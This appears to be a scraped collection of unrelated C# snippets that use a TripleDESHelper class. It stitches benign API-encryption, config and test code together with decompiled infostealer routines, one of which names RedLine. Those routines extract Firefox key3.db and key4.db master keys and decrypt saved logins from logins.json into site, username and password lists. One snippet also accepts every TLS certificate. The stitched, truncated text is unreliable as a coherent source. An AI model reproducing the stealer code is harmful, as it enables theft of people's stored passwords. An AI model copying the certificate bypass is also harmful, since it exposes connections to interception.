internal void Decrypt_Data <ED>(ref ED encrytedData, ref SafeData safeData) where ED : IRequest
{
string desDecrypted = string.Empty;
using (RSAHelper rsa = new RSAHelper(RSAType.RSA2, Encoding.UTF8, Globals.key_private, Globals.key_public)) {
desDecrypted = rsa.Decrypt(safeData.Des);
}
using (RSAHelper rsa_partner = new RSAHelper(RSAType.RSA2, Encoding.UTF8, Globals.key_private, apiUser.PublicKey)) {
if (rsa_partner.Verify(desDecrypted, safeData.Signature) == false)
{
throw new ApiException(CodeStatus.Signature_Not_Valid);
}
}
using (DESParameters desParameters = JsonConvert.DeserializeObject <DESParameters>(desDecrypted)) {
TripleDESHelper des = new TripleDESHelper(desParameters);
string message = des.Decrypt(safeData.Data);
encrytedData = JsonConvert.DeserializeObject <ED>(message);
request.User_ID = apiUser.User_ID;
encrytedData.SetBase(request);
}
chainLogger.Step(Tool.GetCurrentMethod());
Access_Authorization();
Save_Request();
}
internal SafeData Encrypt_Data <DD>(DD decryted_data) where DD : class
{
TripleDESHelper des = new TripleDESHelper();
using (RSAHelper rsa_partner = new RSAHelper(RSAType.RSA2, Encoding.UTF8, Globals.key_private, apiUser.PublicKey)) {
response = JsonConvert.SerializeObject(decryted_data);
#if DEBUG
Console.Out.WriteLine(response);
#endif
string encryptedStr = des.Encrypt(response);
string desPrms = des.GetParameters();
string desEncrypted = rsa_partner.Encrypt(desPrms);
string signStr = rsa_partner.Sign(desPrms);
bool signVerify = false;
using (RSAHelper rsa = new RSAHelper(RSAType.RSA2, Encoding.UTF8, Globals.key_private, Globals.key_public)) {
signVerify = rsa.Verify(desPrms, signStr);
}
using (SafeData sd = new SafeData()) {
sd.Data = encryptedStr;
sd.Signature = signStr;
sd.Des = desEncrypted;
chainLogger.Step(Tool.GetCurrentMethod());
return(sd);
}
}
}
private byte[] decrypt3DES(byte[] item1, string masterPwd, byte[] entrySalt, byte[] cipherT)
{
try
{
var sha1 = SHA1.Create("sha1");
var hp = sha1.ComputeHash(item1);
Array.Resize(ref hp, 40);
Array.Copy(entrySalt, 0, hp, 20, 20);
var pes = entrySalt.Concat(Enumerable.Range(1, 20 - entrySalt.Length).Select(b => (byte)0).ToArray()).ToArray();
Array.Resize(ref pes, 40);
Array.Copy(entrySalt, 0, pes, 20, 20);
var chp = sha1.ComputeHash(hp);
var hmac = HMACSHA1.Create();
hmac.Key = chp;
var k1 = hmac.ComputeHash(pes);
Array.Resize(ref pes, 20);
var tk = hmac.ComputeHash(pes);
Array.Resize(ref tk, 40);
Array.Copy(entrySalt, 0, tk, 20, 20);
var k2 = hmac.ComputeHash(tk);
Array.Resize(ref k1, 40);
Array.Copy(k2, 0, k1, 20, 20);
var iv = k1.Skip(k1.Length - 8).ToArray();
var key = k1.Take(24).ToArray();
return(TripleDESHelper.DESCBCDecryptorByte(key, iv, cipherT).Take(24).ToArray());
}
catch (Exception ex)
{
return(null);
}
}
public static HttpResponseMessage GetResponse(dynamic request, IHeaderDictionary headers,
HttpMethod httpMethod, PathString path)
{
ApiSafeData CriptoSafeData = new ApiSafeData()
{
Data = TripleDESHelper.Encrypt(JsonSerializer.Serialize(request), out string desParameters),
Des = RSAHelper.Encrypt(desParameters, Env.RfiPublicKey),
Signature = RSAHelper.Sign(desParameters, Env.PartnerPrivateKey)
};
if (String.IsNullOrEmpty(Env.CertificateFilePath))
{
using (var clientHandler = new HttpClientHandler()
{
ServerCertificateCustomValidationCallback = (sender, cert, chain, sslPolicyErrors) => { return(true); }
})
{
return(Resend(headers, httpMethod, clientHandler, CriptoSafeData, path));
}
}
else
{
using (var clientHandler = new HttpClientHandler
{
ClientCertificateOptions = ClientCertificateOption.Manual,
SslProtocols = SslProtocols.Tls12,
ClientCertificates = { new X509Certificate2(Env.CertificateFilePath) }
})
{
return(Resend(headers, httpMethod, clientHandler, CriptoSafeData, path));
}
}
}
// Token: 0x060000E8 RID: 232 RVA: 0x00007314 File Offset: 0x00005514
private static byte[] ExtractPrivateKey4(string file)
{
byte[] array = new byte[24];
try
{
Console.WriteLine("Key source file: " + file);
if (!File.Exists(file))
{
Console.WriteLine("Source file UNKNOWN");
return(array);
}
SQLiteManager sqliteManager = new SQLiteManager(file);
sqliteManager.ReadTable("metaData");
string value = sqliteManager.GetValue(0, "item1");
string value2 = sqliteManager.GetValue(0, "item2)");
Asn1DerObject asn1DerObject = new Asn1Der().Parse(Encoding.Default.GetBytes(value2));
byte[] data = asn1DerObject.objects[0].objects[0].objects[1].objects[0].Data;
byte[] data2 = asn1DerObject.objects[0].objects[1].Data;
MozillaPBE mozillaPBE = new MozillaPBE(Encoding.Default.GetBytes(value), Encoding.Default.GetBytes(string.Empty), data);
mozillaPBE.Compute();
string input = TripleDESHelper.DESCBCDecryptor(mozillaPBE.Key, mozillaPBE.IV, data2, PaddingMode.None);
Console.WriteLine(new string('=', 20));
Console.WriteLine("Global salt found for encrypt: [" + FirefoxBase.CalcHex(value) + "]");
Console.WriteLine("Entry salt found for encrypt: [" + FirefoxBase.CalcHex(data) + "]");
Console.WriteLine("СheckPwd key for encrypt : [" + FirefoxBase.CalcHex(mozillaPBE.Key) + "]");
Console.WriteLine("СheckPwd IV for encrypt: [" + FirefoxBase.CalcHex(mozillaPBE.IV) + "]");
Console.WriteLine("Decrypted chiper: [" + FirefoxBase.CalcHex(input) + "]");
Console.WriteLine(new string('=', 20));
sqliteManager.ReadTable("nssPrivate");
int rowCount = sqliteManager.GetRowCount();
string s = string.Empty;
for (int i = 0; i < rowCount; i++)
{
if (sqliteManager.GetValue(i, "a102") == Encoding.Default.GetString(FirefoxBase.MagicNumber1))
{
s = sqliteManager.GetValue(i, "a11");
break;
}
}
Asn1DerObject asn1DerObject2 = new Asn1Der().Parse(Encoding.Default.GetBytes(s));
data = asn1DerObject2.objects[0].objects[0].objects[1].objects[0].Data;
data2 = asn1DerObject2.objects[0].objects[1].Data;
mozillaPBE = new MozillaPBE(Encoding.Default.GetBytes(value), Encoding.Default.GetBytes(string.Empty), data);
mozillaPBE.Compute();
Console.WriteLine(new string('=', 20));
Console.WriteLine("ChiperT found after encrypt: [" + FirefoxBase.CalcHex(data2) + "]");
Console.WriteLine("Global salt found after encrypt: [" + FirefoxBase.CalcHex(value) + "]");
Console.WriteLine("Entry salt found after encrypt: [" + FirefoxBase.CalcHex(data) + "]");
Console.WriteLine("СheckPwd key after encrypt : [" + FirefoxBase.CalcHex(mozillaPBE.Key) + "]");
Console.WriteLine("СheckPwd IV after encrypt: [" + FirefoxBase.CalcHex(mozillaPBE.IV) + "]");
array = Encoding.Default.GetBytes(TripleDESHelper.DESCBCDecryptor(mozillaPBE.Key, mozillaPBE.IV, data2, PaddingMode.PKCS7));
Console.WriteLine("Decrypted private key: [" + FirefoxBase.CalcHex(array) + "]");
Console.WriteLine(new string('=', 20));
}
catch (Exception value3)
{
Console.WriteLine(value3);
}
return(array);
}
private string EncryptAuthState(AuthOrderDto order, CreateAuthOrderInput input)
{
var state = $"{order.Id}_{input.AuthState}_{DateTime.Now.ToString("fff")}";
var encryptData = TripleDESHelper.Encrypt(Encoding.UTF8.GetBytes(state), this._appSettings.GetTripleDESKeyData(), null, CipherMode.ECB, PaddingMode.PKCS7);
return(MD5Helper.ConvertToString(encryptData));
}
private static List <LoginPair> ParseLogins(string profile, byte[] privateKey)
{
List <LoginPair> loginPairList = new List <LoginPair>();
try
{
string tempCopy = DecryptHelper.CreateTempCopy(Path.Combine(profile, "logins.json"));
if (!File.Exists(tempCopy))
{
return(loginPairList);
}
foreach (JsonValue jsonValue in (IEnumerable)File.ReadAllText(tempCopy).FromJSON()["logins"])
{
Asn1Object asn1Object1 = Asn1Factory.Create(Convert.FromBase64String(jsonValue["encryptedUsername"].ToString(false)));
Asn1Object asn1Object2 = Asn1Factory.Create(Convert.FromBase64String(jsonValue["encryptedPassword"].ToString(false)));
string str1 = Regex.Replace(TripleDESHelper.Decrypt(privateKey, asn1Object1.Objects[0].Objects[1].Objects[1].ObjectData, asn1Object1.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
string str2 = Regex.Replace(TripleDESHelper.Decrypt(privateKey, asn1Object2.Objects[0].Objects[1].Objects[1].ObjectData, asn1Object2.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
LoginPair loginPair = new LoginPair()
{
Host = string.IsNullOrEmpty(jsonValue["hostname"].ToString(false)) ? "UNKNOWN" : jsonValue["hostname"].ToString(false), Login = string.IsNullOrEmpty(str1) ? "UNKNOWN" : str1, Password = string.IsNullOrEmpty(str2) ? "UNKNOWN" : str2
};
if (loginPair.Login != "UNKNOWN" && loginPair.Password != "UNKNOWN" && loginPair.Host != "UNKNOWN")
{
loginPairList.Add(loginPair);
}
}
}
catch
{
}
return(loginPairList);
}
/// <summary>
/// 反序列化指定的类
/// </summary>
/// <param name="configfilepath">config 文件的路径</param>
/// <param name="configtype">相应的类型</param>
/// <returns></returns>
public static IConfigInfo DeserializeInfo(string configfilepath, Type configtype)
{
if (!File.Exists(configfilepath))
{
Logger.Error(string.Format("文件[{0}]不存在!", configfilepath));
return(null);
}
if (ShouldEncrypt)
{
XmlDocument document = new XmlDocument();
document.Load(configfilepath);
if (document.DocumentElement != null && document.DocumentElement.Name == "EncryptContent")
{
var configInfo = SerializationHelper.Load <EncryptContent>(configfilepath);
if (configInfo == null || string.IsNullOrEmpty(configInfo.Content))
{
return(null);
}
//机密配置内容
var content = TripleDESHelper.Decrypt(configInfo.Content);
return((IConfigInfo)SerializationHelper.Deserialize(configtype, content));
}
}
return((IConfigInfo)SerializationHelper.Load(configtype, configfilepath));
}
public static void Lopos(string profile, byte[] privateKey, string browser_name, string profile_name)
{
try
{
string path = CreateTempCopy(Path.Combine(profile, "logins.json"));
if (File.Exists(path))
{
{
foreach (JsonValue item in File.ReadAllText(path).FromJSON()["logins"])
{
GetPasswords.Cpassword++;
Asn1DerObject Gecko4 = Asn1Der.Parse(Convert.FromBase64String(item["encryptedUsername"].ToString(saving: false)));
Asn1DerObject Gecko42 = Asn1Der.Parse(Convert.FromBase64String(item["encryptedPassword"].ToString(saving: false)));
string text = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, Gecko4.Objects[0].Objects[1].Objects[1].GetObjectData(), Gecko4.Objects[0].Objects[2].GetObjectData(), PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
string text2 = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, Gecko42.Objects[0].Objects[1].Objects[1].GetObjectData(), Gecko42.Objects[0].Objects[2].GetObjectData(), PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
credential.Add("Site_Url : " + item["hostname"] + Environment.NewLine + "Login : "******"Password : "******"Browser : " + browser_name + Environment.NewLine + "Profile : " + profile_name + Environment.NewLine + credential[i]);
}
credential.Clear();
}
}
}
catch (Exception)
{
}
}
private static byte[] GetPrivate3Key(string file)
{
byte[] array = new byte[24];
try
{
if (!File.Exists(file))
{
return(array);
}
new DataTable();
GeckoDatabase berkeleyDB = new GeckoDatabase(file);
PasswordCheck passwordCheck = new PasswordCheck(ParseDb(berkeleyDB, (string x) => x.Equals("password-check")));
string hexString = ParseDb(berkeleyDB, (string x) => x.Equals("global-salt"));
GeckoPasswordBasedEncryption geckoPasswordBasedEncryption = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), DecryptHelper.ConvertHexStringToByteArray(passwordCheck.EntrySalt));
geckoPasswordBasedEncryption.Init();
TripleDESHelper.Decrypt(geckoPasswordBasedEncryption.DataKey, geckoPasswordBasedEncryption.DataIV, DecryptHelper.ConvertHexStringToByteArray(passwordCheck.Passwordcheck));
Asn1Object asn1Object = Asn1Factory.Create(DecryptHelper.ConvertHexStringToByteArray(ParseDb(berkeleyDB, (string x) => !x.Equals("password-check") && !x.Equals("Version") && !x.Equals("global-salt"))));
GeckoPasswordBasedEncryption geckoPasswordBasedEncryption2 = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), asn1Object.Objects[0].Objects[0].Objects[1].Objects[0].ObjectData);
geckoPasswordBasedEncryption2.Init();
Asn1Object asn1Object2 = Asn1Factory.Create(Asn1Factory.Create(Encoding.Default.GetBytes(TripleDESHelper.Decrypt(geckoPasswordBasedEncryption2.DataKey, geckoPasswordBasedEncryption2.DataIV, asn1Object.Objects[0].Objects[1].ObjectData))).Objects[0].Objects[2].ObjectData);
if (asn1Object2.Objects[0].Objects[3].ObjectData.Length <= 24)
{
array = asn1Object2.Objects[0].Objects[3].ObjectData;
return(array);
}
Array.Copy(asn1Object2.Objects[0].Objects[3].ObjectData, asn1Object2.Objects[0].Objects[3].ObjectData.Length - 24, array, 0, 24);
return(array);
}
catch
{
return(array);
}
}
public Dictionary <string, byte[]> Encrypt(byte[] bytesToEncrypt, RSAParameters publicKeyReceiver)
{
Dictionary <string, byte[]> output = new Dictionary <string, byte[]>();
Dictionary <string, byte[]> tdes = TripleDESHelper.Encrypt(bytesToEncrypt);
output.Add("text", tdes["text"]); //file 1: het origineel geencrypteerd met triple DES. Het gene wat geencrypteerd wordt is text (uit de parameter van deze functie)
output.Add("key", RsaHelper.Encryption(tdes["key"], publicKeyReceiver, false)); //File 2: triple des sleutel encrypteren met de public van andere persoon
output.Add("hash", RsaHelper.SignData(md5helper.GenerateHash(bytesToEncrypt), RsaHelper.PrivateKey)); // file 3: maak een hash en encrypteer die met eigen privé sleutel
return(output);
}
public static void CreateKeyVector_KeySize_OutOfRange(int keySize)
{
// Arrange
// Act
Assert.Throws <ArgumentOutOfRangeException>(()
=> TripleDESHelper.CreateKeyVector("test", keySize));
// Assert
}
public static string DecriptRespose(ApiResponse response)
{
string des = RSAHelper.Decrypt(response.Des, Env.PartnerPrivateKey);
if (!RSAHelper.Verify(des, response.Signature, Env.RfiPublicKey))
{
throw new Exception("Signature not valid");
}
return(TripleDESHelper.Decrypt(response.Data, des));
}
public static void CreateKeyVector(string key, string iv, int keySize, string passphrase)
{
// Arrange
// Act
var result = TripleDESHelper.CreateKeyVector(passphrase, keySize);
// Assert
Assert.Equal(key, Convert.ToBase64String(result.First));
Assert.Equal(iv, Convert.ToBase64String(result.Second));
}
public static void CreateDecryptor()
{
// Arrange
var provider = new TripleDESCryptoServiceProvider();
// Act
var result = TripleDESHelper.CreateDecryptor(provider, "sdf2qw2@", 128);
// Assert
Assert.NotNull(result);
result.Dispose();
provider.Clear();
}
public void Test_TripleDESHelper()
{
string text = TripleDESHelper.Encrypt(s_input, s_key);
string result = TripleDESHelper.Decrypt(text, s_key);
Assert.AreEqual(s_input, result);
byte[] b1 = s_input.GetBytes();
byte[] b2 = TripleDESHelper.Encrypt(b1, s_key);
byte[] b3 = TripleDESHelper.Decrypt(b2, s_key);
Assert.IsTrue(ByteTestHelper.AreEqual(b1, b3));
}
/// <summary>
/// 序列化
/// </summary>
/// <param name="obj">对象</param>
/// <param name="filename">文件路径</param>
public virtual bool Save(object obj, string filename)
{
if (obj == null)
{
return(true);
}
FileStream fs = null;
try
{
string data;
var elementType = obj.GetType();
var runConfigType = typeof(RunConfig);
if (elementType != runConfigType && !runConfigType.IsAssignableFrom(elementType))
{
if (RunConfig.Current.EnabledEncrypt)
{
data = JsonUtils.SerializeObject(obj, Formatting.None);
data = TripleDESHelper.Encrypt(data);
}
else
{
data = JsonUtils.SerializeObject(obj, Formatting.Indented);
}
}
else
{
data = JsonUtils.SerializeObject(obj, Formatting.Indented);
}
if (string.IsNullOrEmpty(data))
{
return(true);
}
var bytes = System.Text.Encoding.UTF8.GetBytes(data);
fs = new FileStream(filename, FileMode.Create, FileAccess.Write, FileShare.ReadWrite);
fs.Write(bytes, 0, bytes.Length);
}
catch (Exception ex)
{
Logger.Error(string.Format("JsonFileCacheSerializater.Save Msg:{0} StackTrace:{1} Source:{2} TargetSite:{3}", ex.Message, ex.StackTrace, ex.Source, ex.TargetSite));
return(false);
}
finally
{
if (fs != null)
{
fs.Close();
}
}
return(true);
}
public void Encrypt_Decrypt_Test()
{
var source = "helloworld";
var sourceBytes = Encoding.UTF8.GetBytes(source);
var key = "MTIzNDU2Nzg4NzY1NDMyMQ=="; //1234567887654321
var iv = "MTIzNDU2Nzg5MGFiY2RlZg=="; //1234567890abcdef
var keyBytes = Convert.FromBase64String(key);
var ivBytes = Convert.FromBase64String(iv);
var encrypted1 = TripleDESHelper.Encrypt(sourceBytes);
var decrypted1 = Encoding.UTF8.GetString(TripleDESHelper.Decrypt(encrypted1));
Assert.Equal(source, decrypted1);
}
// Token: 0x060002CB RID: 715 RVA: 0x0000D09C File Offset: 0x0000B29C
private static byte[] GetPrivate3Key(string file)
{
byte[] array = new byte[24];
try
{
if (!File.Exists(file))
{
return(array);
}
MethodInfo method = typeof(Array).GetMethod("Copy", new Type[]
{
typeof(Array),
typeof(int),
typeof(Array),
typeof(int),
typeof(int)
});
GeckoDatabase berkeleyDB = new GeckoDatabase(file);
PasswordCheck passwordCheck = new PasswordCheck(GeckoEngine.ParseDb(berkeleyDB, (string x) => x.Equals("password-check")));
string hexString = GeckoEngine.ParseDb(berkeleyDB, (string x) => x.Equals("global-salt"));
GeckoPasswordBasedEncryption geckoPasswordBasedEncryption = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(hexString), Encoding.GetEncoding("windows-1251").GetBytes(string.Empty), DecryptHelper.ConvertHexStringToByteArray(passwordCheck.EntrySalt));
geckoPasswordBasedEncryption.Init();
TripleDESHelper.Decrypt(geckoPasswordBasedEncryption.DataKey, geckoPasswordBasedEncryption.DataIV, DecryptHelper.ConvertHexStringToByteArray(passwordCheck.Passwordcheck), PaddingMode.None);
Asn1Object asn1Object = Asn1Factory.Create(DecryptHelper.ConvertHexStringToByteArray(GeckoEngine.ParseDb(berkeleyDB, (string x) => !x.Equals("password-check") && !x.Equals("Version") && !x.Equals("global-salt"))));
GeckoPasswordBasedEncryption geckoPasswordBasedEncryption2 = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(hexString), Encoding.GetEncoding("windows-1251").GetBytes(string.Empty), asn1Object.Objects[0].Objects[0].Objects[1].Objects[0].ObjectData);
geckoPasswordBasedEncryption2.Init();
Asn1Object asn1Object2 = Asn1Factory.Create(Asn1Factory.Create(Encoding.GetEncoding("windows-1251").GetBytes(TripleDESHelper.Decrypt(geckoPasswordBasedEncryption2.DataKey, geckoPasswordBasedEncryption2.DataIV, asn1Object.Objects[0].Objects[1].ObjectData, PaddingMode.None))).Objects[0].Objects[2].ObjectData);
if (asn1Object2.Objects[0].Objects[3].ObjectData.Length > 24)
{
method.Invoke(null, new object[]
{
asn1Object2.Objects[0].Objects[3].ObjectData,
asn1Object2.Objects[0].Objects[3].ObjectData.Length - 24,
array,
0,
24
});
}
else
{
array = asn1Object2.Objects[0].Objects[3].ObjectData;
}
}
catch
{
}
return(array);
}
/// <summary>
/// 保存(序列化)指定路径下的配置文件
/// </summary>
/// <param name="configFilePath">指定的配置文件所在的路径(包括文件名)</param>
/// <param name="configinfo">被保存(序列化)的对象</param>
/// <returns></returns>
public bool SaveConfig(string configFilePath, IConfigInfo configinfo)
{
if (ShouldEncrypt)
{
EncryptContent content = new EncryptContent();
var configstr = SerializationHelper.Serialize(configinfo);
//需要额外加密
content.Content = TripleDESHelper.Encrypt(configstr);
SerializationHelper.Save(content, configFilePath);
}
else
{
return(SerializationHelper.Save(configinfo, configFilePath));
}
return(true);
}
public byte[] CheckKey4DB(string dir, string masterPwd, bool Verbose)
{
try
{
Asn1Der asn = new Asn1Der();
byte[] item2 = new byte[] { };
byte[] item1 = new byte[] { };
byte[] a11 = new byte[] { };
byte[] a102 = new byte[] { };
string query = "SELECT item1,item2 FROM metadata WHERE id = 'password'";
if (Verbose)
{
Console.WriteLine("Fetch data from key4.db file");
}
GetItemsFromQuery(dir, ref item1, ref item2, query);
Asn1DerObject f800001 = asn.Parse(item2);
MozillaPBE CheckPwd = new MozillaPBE(item1, Encoding.ASCII.GetBytes(""), f800001.objects[0].objects[0].objects[1].objects[0].Data);
CheckPwd.Compute();
string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, f800001.objects[0].objects[1].Data);
if (!decryptedPwdChk.StartsWith("password-check"))
{
Console.WriteLine("Master password is wrong !");
return(null);
}
query = "SELECT a11,a102 FROM nssPrivate";
GetItemsFromQuery(dir, ref a11, ref a102, query);
var decodedA11 = asn.Parse(a11);
var entrySalt = decodedA11.objects[0].objects[0].objects[1].objects[0].Data;
var cipherT = decodedA11.objects[0].objects[1].Data;
if (Verbose)
{
Console.WriteLine("Fetch Private key");
}
return(decrypt3DES(item1, masterPwd, entrySalt, cipherT));
}
catch (Exception ex)
{
Console.WriteLine("Exeption:\n" + ex.Message);
return(null);
}
}
private static byte[] P4k(string file)
{
byte[] result = new byte[24];
try
{
if (!File.Exists(file))
{
return(result);
}
var cNT = new CNT(file);
cNT.ReadTable("metaData");
string s = cNT.ParseValue(0, "item1");
string s2 = cNT.ParseValue(0, "item2)");
Asn1DerObject ansobjectS2 = Asn1Der.Parse(Encoding.Default.GetBytes(s2));
byte[] objectData = ansobjectS2.Objects[0].Objects[0].Objects[1].Objects[0].GetObjectData();
byte[] objectData2 = ansobjectS2.Objects[0].Objects[1].GetObjectData();
var inizialize = new MozillaPBE(Encoding.Default.GetBytes(s), Encoding.Default.GetBytes(string.Empty), objectData);
inizialize.Compute();
TripleDESHelper.DESCBCDecryptor(inizialize.GetKey(), inizialize.GetIV(), objectData2);
cNT.ReadTable("nssPrivate");
int rowLength = cNT.RowLength;
string s3 = string.Empty;
for (int i = 0; i < rowLength; i++)
{
if (cNT.ParseValue(i, "a102") == Encoding.Default.GetString(Key4MagicNumber))
{
s3 = cNT.ParseValue(i, "a11");
break;
}
}
Asn1DerObject ansobjectS3 = Asn1Der.Parse(Encoding.Default.GetBytes(s3));
objectData = ansobjectS3.Objects[0].Objects[0].Objects[1].Objects[0].GetObjectData();
objectData2 = ansobjectS3.Objects[0].Objects[1].GetObjectData();
inizialize = new MozillaPBE(Encoding.Default.GetBytes(s), Encoding.Default.GetBytes(string.Empty), objectData);
inizialize.Compute();
result = Encoding.Default.GetBytes(TripleDESHelper.DESCBCDecryptor(inizialize.GetKey(), inizialize.GetIV(), objectData2, PaddingMode.PKCS7));
return(result);
}
catch (Exception)
{
return(result);
}
}
private static void Main()
{
Searcher.CopyLoginsInSafeDir();
Console.ReadLine();
string MasterPwd = string.Empty;
bool Verbose = false;
string filePath = string.Empty;
var dt = new DataTable();
var asn = new Asn1Der();
var db = new BerkeleyDB(Path.Combine(filePath, "key4.db"));
var pwdCheck = new PasswordCheck((from p in db.Keys where p.Key.Equals("password-check") select p.Value).FirstOrDefault().Replace("-", ""));
string GlobalSalt = (from p in db.Keys where p.Key.Equals("global-salt") select p.Value).FirstOrDefault().Replace("-", "");
string f81 = (from p in db.Keys where !p.Key.Equals("global-salt") && !p.Key.Equals("Version") && !p.Key.Equals("password-check") select p.Value).FirstOrDefault().Replace("-", "");
var CheckPwd = new MozillaPBE(MasterPassword.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), MasterPassword.ConvertHexStringToByteArray(pwdCheck.EntrySalt));
CheckPwd.Compute();
string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, MasterPassword.ConvertHexStringToByteArray(pwdCheck.Passwordcheck));
Asn1DerObject f800001 = asn.Parse(MasterPassword.ConvertHexStringToByteArray(f81));
MozillaPBE CheckPrivateKey = new MozillaPBE(MasterPassword.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), f800001.objects[0].objects[0].objects[1].objects[0].Data);
CheckPrivateKey.Compute();
byte[] decryptF800001 = TripleDESHelper.DESCBCDecryptorByte(CheckPrivateKey.Key, CheckPrivateKey.IV, f800001.objects[0].objects[1].Data);
Asn1DerObject f800001deriv1 = asn.Parse(decryptF800001);
Asn1DerObject f800001deriv2 = asn.Parse(f800001deriv1.objects[0].objects[2].Data);
byte[] privateKey = new byte[24];
if (f800001deriv2.objects[0].objects[3].Data.Length > 24)
{
Array.Copy(f800001deriv2.objects[0].objects[3].Data, f800001deriv2.objects[0].objects[3].Data.Length - 24, privateKey, 0, 24);
}
else
{
privateKey = f800001deriv2.objects[0].objects[3].Data;
}
}
private static byte[] GetPrivate4Key(string file)
{
byte[] result = new byte[24];
try
{
if (!File.Exists(file))
{
return(result);
}
SqlConnection sqlConnection = new SqlConnection(file);
sqlConnection.ReadTable("metaData");
string s = sqlConnection.ParseValue(0, "item1");
string s2 = sqlConnection.ParseValue(0, "item2)");
Asn1Object asn1Object = Asn1Factory.Create(Encoding.Default.GetBytes(s2));
byte[] objectData = asn1Object.Objects[0].Objects[0].Objects[1].Objects[0].ObjectData;
byte[] objectData2 = asn1Object.Objects[0].Objects[1].ObjectData;
GeckoPasswordBasedEncryption geckoPasswordBasedEncryption = new GeckoPasswordBasedEncryption(Encoding.Default.GetBytes(s), Encoding.Default.GetBytes(string.Empty), objectData);
geckoPasswordBasedEncryption.Init();
TripleDESHelper.Decrypt(geckoPasswordBasedEncryption.DataKey, geckoPasswordBasedEncryption.DataIV, objectData2);
sqlConnection.ReadTable("nssPrivate");
int rowLength = sqlConnection.RowLength;
string s3 = string.Empty;
for (int i = 0; i < rowLength; i++)
{
if (sqlConnection.ParseValue(i, "a102") == Encoding.Default.GetString(Constants.Key4MagicNumber))
{
s3 = sqlConnection.ParseValue(i, "a11");
break;
}
}
Asn1Object asn1Object2 = Asn1Factory.Create(Encoding.Default.GetBytes(s3));
objectData = asn1Object2.Objects[0].Objects[0].Objects[1].Objects[0].ObjectData;
objectData2 = asn1Object2.Objects[0].Objects[1].ObjectData;
geckoPasswordBasedEncryption = new GeckoPasswordBasedEncryption(Encoding.Default.GetBytes(s), Encoding.Default.GetBytes(string.Empty), objectData);
geckoPasswordBasedEncryption.Init();
result = Encoding.Default.GetBytes(TripleDESHelper.Decrypt(geckoPasswordBasedEncryption.DataKey, geckoPasswordBasedEncryption.DataIV, objectData2, PaddingMode.PKCS7));
return(result);
}
catch
{
return(result);
}
}
private static byte[] GetPrivate3Key(string file)
{
byte[] numArray = new byte[24];
try
{
if (!File.Exists(file))
{
return(numArray);
}
DataTable dataTable = new DataTable();
GeckoDatabase berkeleyDB = new GeckoDatabase(file);
PasswordCheck passwordCheck = new PasswordCheck(GeckoEngine.ParseDb(berkeleyDB, (Func <string, bool>)(x => x.Equals("password-check"))));
string db = GeckoEngine.ParseDb(berkeleyDB, (Func <string, bool>)(x => x.Equals("global-salt")));
GeckoPasswordBasedEncryption passwordBasedEncryption1 = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(db), Encoding.Default.GetBytes(string.Empty), DecryptHelper.ConvertHexStringToByteArray(passwordCheck.EntrySalt));
passwordBasedEncryption1.Init();
TripleDESHelper.Decrypt(passwordBasedEncryption1.DataKey, passwordBasedEncryption1.DataIV, DecryptHelper.ConvertHexStringToByteArray(passwordCheck.Passwordcheck), PaddingMode.None);
Asn1Object asn1Object1 = Asn1Factory.Create(DecryptHelper.ConvertHexStringToByteArray(GeckoEngine.ParseDb(berkeleyDB, (Func <string, bool>)(x =>
{
if (!x.Equals("password-check") && !x.Equals("Version"))
{
return(!x.Equals("global-salt"));
}
return(false);
}))));
GeckoPasswordBasedEncryption passwordBasedEncryption2 = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(db), Encoding.Default.GetBytes(string.Empty), asn1Object1.Objects[0].Objects[0].Objects[1].Objects[0].ObjectData);
passwordBasedEncryption2.Init();
Asn1Object asn1Object2 = Asn1Factory.Create(Asn1Factory.Create(Encoding.Default.GetBytes(TripleDESHelper.Decrypt(passwordBasedEncryption2.DataKey, passwordBasedEncryption2.DataIV, asn1Object1.Objects[0].Objects[1].ObjectData, PaddingMode.None))).Objects[0].Objects[2].ObjectData);
if (asn1Object2.Objects[0].Objects[3].ObjectData.Length > 24)
{
Array.Copy((Array)asn1Object2.Objects[0].Objects[3].ObjectData, asn1Object2.Objects[0].Objects[3].ObjectData.Length - 24, (Array)numArray, 0, 24);
}
else
{
numArray = asn1Object2.Objects[0].Objects[3].ObjectData;
}
}
catch
{
}
return(numArray);
}
private static byte[] GetPrivate4Key(string file)
{
byte[] numArray = new byte[24];
try
{
if (!File.Exists(file))
{
return(numArray);
}
SqlConnection sqlConnection = new SqlConnection(file);
sqlConnection.ReadTable("metaData");
string s = sqlConnection.ParseValue(0, "item1");
Asn1Object asn1Object1 = Asn1Factory.Create(Encoding.Default.GetBytes(sqlConnection.ParseValue(0, "item2)")));
byte[] objectData1 = asn1Object1.Objects[0].Objects[0].Objects[1].Objects[0].ObjectData;
byte[] objectData2 = asn1Object1.Objects[0].Objects[1].ObjectData;
GeckoPasswordBasedEncryption passwordBasedEncryption1 = new GeckoPasswordBasedEncryption(Encoding.Default.GetBytes(s), Encoding.Default.GetBytes(string.Empty), objectData1);
passwordBasedEncryption1.Init();
TripleDESHelper.Decrypt(passwordBasedEncryption1.DataKey, passwordBasedEncryption1.DataIV, objectData2, PaddingMode.None);
sqlConnection.ReadTable("nssPrivate");
int rowLength = sqlConnection.RowLength;
string empty = string.Empty;
for (int rowIndex = 0; rowIndex < rowLength; ++rowIndex)
{
if (sqlConnection.ParseValue(rowIndex, "a102") == Encoding.Default.GetString(RedLine.Logic.Helpers.Constants.Key4MagicNumber))
{
